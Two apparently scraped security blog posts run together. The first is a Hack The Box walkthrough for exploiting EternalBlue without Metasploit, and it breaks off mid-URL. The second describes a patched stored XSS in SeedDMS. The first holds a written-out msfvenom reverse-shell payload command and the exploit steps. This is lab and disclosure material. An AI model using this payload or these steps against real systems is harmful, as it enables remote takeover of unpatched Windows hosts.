Background: As a part of my preparation for OSCP, I came across a way to manually exploit eternal blue (without metasploit). So compiling the same here so it could be useful to others too. For the purpose of demonstration I am using blue machine from Hack the Box (HTB). Exploit Use searchsploit to find the eternal blue exploit or you can even download it from exploitdb Now there are some modifications required and files required. We need to first make our backdoor exe to get a shell back. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > blue.exe Now we need to make few changes in the script from Exploitdb or searchsploit as follows: If we go through the script it will tell us we also need a smb file as a dependency for running this script. So you can download that file from here Now open a listener to get back a shell and run the script with the argument "netsvcs" Reference: https://github.com/worawit/MS17-010/blob/master/mysmb.py ht
Summary: Recently I got 4 CVEs for reporting security issues in an opensource software namely SeedDMS. This particular post talks about the Exploit for CVE-2019-12932 which was present in SeedDMS 5.1.11 and has been patched and 5.1.12 has been released to fix the same. Exploit: Login to the application as a user and make a new folder, with your payload in name parameter as shown. Now save it as shown. Now search for the folder name to execute the XSS. I try to keep my posts as precise and to the point so incase you face any issue replicating the same, feel free to comment.